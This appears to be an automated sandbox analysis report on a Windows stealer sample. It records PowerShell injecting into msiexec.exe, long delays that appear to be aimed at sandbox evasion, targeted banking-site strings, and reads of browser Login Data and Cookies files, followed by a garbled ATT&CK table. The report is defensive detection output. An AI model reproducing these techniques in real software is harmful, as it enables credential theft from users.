          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599890Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599671Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599343Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599234Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599124Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599015Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598906Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598796Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598687Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598578Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598465Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598359Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598249Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598140Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598031Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597921Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597812Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597702Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597593Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597484Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597374Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597265Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597156Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597046Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596937Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596828Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596718Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596609Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596499Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596390Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596281Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596171Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596062Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595952Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595843Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595734Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595624Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595515Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595406Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595296Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595187Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595077Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594968Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594859Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594749Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594640Jump to behavior
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3277125256.00000000058D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
          Source: msiexec.exe, 00000005.00000002.3277125256.000000000587A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3277125256.00000000058D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWG
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000224D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
          Source: msiexec.exe, 00000005.00000002.3292249295.00000000227F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeAPI call chain: ExitProcess graph end nodegraph_0-3411
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeAPI call chain: ExitProcess graph end nodegraph_0-3565
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0505D504 LdrInitializeThunk,2_2_0505D504
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3B50000Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2364, type: MEMORYSTR
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2364, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2364, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          2
          Obfuscated Files or Information
          1
          OS Credential Dumping
          2
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          1
          Web Service
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts2
          PowerShell
          Boot or Logon Initialization Scripts1
          Access Token Manipulation
          1
          Software Packing
          LSASS Memory14
          System Information Discovery
          Remote Desktop Protocol1
          Data from Local System
          3
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
          Process Injection
          1
          DLL Side-Loading
          Security Account Manager11
          Security Software Discovery
          SMB/Windows Admin Shares1
          Email Collection
          11
          Encrypted Channel
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Masquerading
          NTDS1
          Process Discovery
          Distributed Component Object Model1
          Clipboard Data
          3
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
          Virtualization/Sandbox Evasion
          LSA Secrets21
          Virtualization/Sandbox Evasion
          SSHKeylogging14
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Access Token Manipulation
          Cached Domain Credentials1
          Application Window Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
          Process Injection
          DCSync1
          System Network Configuration Discovery
